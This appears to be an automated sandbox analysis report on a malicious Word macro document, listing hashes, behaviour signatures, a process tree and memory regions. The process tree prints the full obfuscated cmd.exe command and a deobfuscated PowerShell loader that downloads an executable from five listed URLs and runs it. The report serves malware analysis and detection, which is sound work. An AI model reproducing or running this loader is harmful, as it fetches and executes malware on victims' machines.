Analysis

  • max time kernel
    101s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    29-08-2024 15:27

General

  • Target
    c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc
  • Size
    248KB
  • MD5
    c918f47fda0745fedaca86195397ace0
  • SHA1
    90367cd9c7d83d6028e0125123541a138c5a82d6
  • SHA256
    7af935b7cd7ddc1383ca817ba41f0784340459331754fcdfa4348fc2a2fe7813
  • SHA512
    894663307c2bc59f31ac3fd5ae6934971dd8b7beebbbcb18de5d020ad43309baf8a1012662c33b195dc1bd3bfcaae45a87e5b5ef396cb58d0e56f0956fb781ac
  • SSDEEP
    3072:BO4ZAi7XnrA+Tj7/tKXYAO+aqjL/xSu90OoiLuDKZXfwKeljR17:BOCA83rA+Tj7lKYMa4xUOmD+XfwLH

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (exe.dropper)
    http://ttobus.com/ZtzZFiHGL_r
    http://bilanacc.com/P7BuwLoQsTjP0hBVF
    http://gclubfan.com/ahjpTwNsvu2X_Q7h
    http://katariahospital.com/tquLevYG
    http://pjfittedkitchens.com/uerfWET_jrbze

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1724
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\tiqdul\ncjld\jwcpob\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set gN=xepg'bE-QWi$d3=t1YG/Mzn}(Dwl:4\5~hUZPC{AmIL%76uXf y0Nkj+S;BO)a@TqF_.2sHv,c9oVr&&for %4 in (2,75,26,43,36,34,58,42,41,37,28,32,31,72,16,43,77,43,56,6,56,56,41,59,52,52,39,20,6,28,32,7,29,72,16,43,33,43,63,6,20,36,28,32,7,13,72,16,43,27,27,49,11,54,33,40,12,2,14,4,54,48,69,71,10,69,40,4,57,11,12,48,26,75,54,14,22,1,26,7,75,5,54,1,73,15,49,52,1,15,67,9,1,5,37,27,10,1,22,15,57,11,48,10,10,54,61,14,4,33,15,15,2,28,19,19,15,15,75,5,46,69,67,73,75,40,19,35,15,21,35,65,10,70,18,42,66,77,62,33,15,15,2,28,19,19,5,10,27,61,22,61,73,73,67,73,75,40,19,36,44,58,46,26,42,75,8,69,63,54,36,51,33,58,76,65,62,33,15,15,2,28,19,19,3,73,27,46,5,48,61,22,67,73,75,40,19,61,33,54,2,63,26,52,69,71,46,68,47,66,8,44,33,62,33,15,15,2,28,19,19,53,61,15,61,77,10,61,33,75,69,2,10,15,61,27,67,73,75,40,19,15,64,46,42,1,71,17,18,62,33,15,15,2,28,19,19,2,54,48,10,15,15,1,12,53,10,15,73,33,1,22,69,67,73,75,40,19,46,1,77,48,9,6,63,66,54,77,5,21,1,4,67,56,2,27,10,15,24,4,62,4,60,57,11,64,73,10,73,54,5,54,14,4,15,26,75,64,2,10,4,57,11,64,69,69,48,61,49,14,49,4,74,74,45,4,57,11,33,5,40,26,54,53,10,14,4,71,5,40,10,2,71,26,4,57,11,15,10,22,21,64,14,11,1,22,71,28,15,1,40,2,55,4,30,4,55,11,64,69,69,48,61,55,4,67,1,0,1,4,57,48,75,77,1,61,73,33,24,11,22,10,21,5,26,49,10,22,49,11,48,10,10,54,61,60,38,15,77,50,38,11,12,48,26,75,54,67,25,75,26,22,27,75,61,12,65,10,27,1,24,11,22,10,21,5,26,72,49,11,15,10,22,21,64,60,57,11,26,71,69,48,26,14,4,26,21,10,64,64,22,4,57,41,48,49,24,24,18,1,15,7,41,15,1,40,49,11,15,10,22,21,64,60,67,27,1,22,3,15,33,49,7,3,1,49,29,51,51,51,51,60,49,38,41,22,71,75,53,1,7,41,15,1,40,49,11,15,10,22,21,64,57,11,71,48,15,33,77,15,15,14,4,73,75,75,73,2,10,69,4,57,5,77,1,61,53,57,23,23,73,61,15,73,33,38,23,23,11,61,12,64,10,5,73,14,4,22,27,26,26,10,33,4,57,78)do set WM=!WM!!gN:~%4,1!&&if %4 gtr 77 echo !WM:*WM!=!|%CommonProgramFiles(x86):~23,1%m%ALLUSERSPROFILE:~-4,-3% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Windows\SysWOW64\cmd.exe
        CmD /V:O/C"set gN=xepg'bE-QWi$d3=t1YG/Mzn}(Dwl:4\5~hUZPC{AmIL%76uXf y0Nkj+S;BO)a@TqF_.2sHv,c9oVr&&for %4 in (2,75,26,43,36,34,58,42,41,37,28,32,31,72,16,43,77,43,56,6,56,56,41,59,52,52,39,20,6,28,32,7,29,72,16,43,33,43,63,6,20,36,28,32,7,13,72,16,43,27,27,49,11,54,33,40,12,2,14,4,54,48,69,71,10,69,40,4,57,11,12,48,26,75,54,14,22,1,26,7,75,5,54,1,73,15,49,52,1,15,67,9,1,5,37,27,10,1,22,15,57,11,48,10,10,54,61,14,4,33,15,15,2,28,19,19,15,15,75,5,46,69,67,73,75,40,19,35,15,21,35,65,10,70,18,42,66,77,62,33,15,15,2,28,19,19,5,10,27,61,22,61,73,73,67,73,75,40,19,36,44,58,46,26,42,75,8,69,63,54,36,51,33,58,76,65,62,33,15,15,2,28,19,19,3,73,27,46,5,48,61,22,67,73,75,40,19,61,33,54,2,63,26,52,69,71,46,68,47,66,8,44,33,62,33,15,15,2,28,19,19,53,61,15,61,77,10,61,33,75,69,2,10,15,61,27,67,73,75,40,19,15,64,46,42,1,71,17,18,62,33,15,15,2,28,19,19,2,54,48,10,15,15,1,12,53,10,15,73,33,1,22,69,67,73,75,40,19,46,1,77,48,9,6,63,66,54,77,5,21,1,4,67,56,2,27,10,15,24,4,62,4,60,57,11,64,73,10,73,54,5,54,14,4,15,26,75,64,2,10,4,57,11,64,69,69,48,61,49,14,49,4,74,74,45,4,57,11,33,5,40,26,54,53,10,14,4,71,5,40,10,2,71,26,4,57,11,15,10,22,21,64,14,11,1,22,71,28,15,1,40,2,55,4,30,4,55,11,64,69,69,48,61,55,4,67,1,0,1,4,57,48,75,77,1,61,73,33,24,11,22,10,21,5,26,49,10,22,49,11,48,10,10,54,61,60,38,15,77,50,38,11,12,48,26,75,54,67,25,75,26,22,27,75,61,12,65,10,27,1,24,11,22,10,21,5,26,72,49,11,15,10,22,21,64,60,57,11,26,71,69,48,26,14,4,26,21,10,64,64,22,4,57,41,48,49,24,24,18,1,15,7,41,15,1,40,49,11,15,10,22,21,64,60,67,27,1,22,3,15,33,49,7,3,1,49,29,51,51,51,51,60,49,38,41,22,71,75,53,1,7,41,15,1,40,49,11,15,10,22,21,64,57,11,71,48,15,33,77,15,15,14,4,73,75,75,73,2,10,69,4,57,5,77,1,61,53,57,23,23,73,61,15,73,33,38,23,23,11,61,12,64,10,5,73,14,4,22,27,26,26,10,33,4,57,78)do set WM=!WM!!gN:~%4,1!&&if %4 gtr 77 echo !WM:*WM!=!|CmD "
        3⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $jhmdp='jfsvism';$dfwoj=new-object Net.WebClient;$fiija='http://ttobus.com/ZtzZFiHGL_r@http://bilanacc.com/P7BuwLoQsTjP0hBVF@http://gclubfan.com/ahjpTwNsvu2X_Q7h@http://katariahospital.com/tquLevYG@http://pjfittedkitchens.com/uerfWET_jrbze'.Split('@');$qcicjbj='twoqpi';$qssfa = '996';$hbmwjki='vbmipvw';$tinzq=$env:temp+'\'+$qssfa+'.exe';foreach($nizbw in $fiija){try{$dfwoj.DownloadFile($nizbw, $tinzq);$wvsfw='wziqqn';If ((Get-Item $tinzq).length -ge 40000) {Invoke-Item $tinzq;$vfthrtt='coocpis';break;}}catch{}}$adqibc='nlwwih';"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2980
        • C:\Windows\SysWOW64\cmd.exe
          CmD
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell $jhmdp='jfsvism';$dfwoj=new-object Net.WebClient;$fiija='http://ttobus.com/ZtzZFiHGL_r@http://bilanacc.com/P7BuwLoQsTjP0hBVF@http://gclubfan.com/ahjpTwNsvu2X_Q7h@http://katariahospital.com/tquLevYG@http://pjfittedkitchens.com/uerfWET_jrbze'.Split('@');$qcicjbj='twoqpi';$qssfa = '996';$hbmwjki='vbmipvw';$tinzq=$env:temp+'\'+$qssfa+'.exe';foreach($nizbw in $fiija){try{$dfwoj.DownloadFile($nizbw, $tinzq);$wvsfw='wziqqn';If ((Get-Item $tinzq).length -ge 40000) {Invoke-Item $tinzq;$vfthrtt='coocpis';break;}}catch{}}$adqibc='nlwwih';
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2160
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
      PID:2272

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize
    19KB
    MD5
    9249955c958ebbb5d1967020abd5021c
    SHA1
    08ca7648bd0ae4fa60d68e07bffafa0661739a89
    SHA256
    d488150e9503a40c59a625c5f472ee5daee6c7517c796492a37a88c8dd68e27c
    SHA512
    f6266477f6d2ff8086fd6155db7d59b616696a06983bb0deaf4c5e972edff6c2664b4911591204abba3695f01e85f67355d9c8598ab1c7c36a111f57f3abc2df
  • memory/1724-88-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB
  • memory/1724-67-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB
  • memory/1724-86-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB
  • memory/1724-85-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB
  • memory/1724-17-0x0000000006A10000-0x0000000006B10000-memory.dmp
    Filesize
    1024KB
  • memory/1724-16-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB
  • memory/1724-89-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB
  • memory/1724-0-0x000000002F5F1000-0x000000002F5F2000-memory.dmp
    Filesize
    4KB
  • memory/1724-122-0x0000000070D3D000-0x0000000070D48000-memory.dmp
    Filesize
    44KB
  • memory/1724-2-0x0000000070D3D000-0x0000000070D48000-memory.dmp
    Filesize
    44KB
  • memory/1724-58-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB
  • memory/1724-96-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB
  • memory/1724-97-0x0000000070D3D000-0x0000000070D48000-memory.dmp
    Filesize
    44KB
  • memory/1724-98-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB
  • memory/1724-99-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB
  • memory/1724-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize
    64KB
  • memory/1724-121-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize
    64KB
  • memory/1724-87-0x0000000005390000-0x0000000005490000-memory.dmp
    Filesize
    1024KB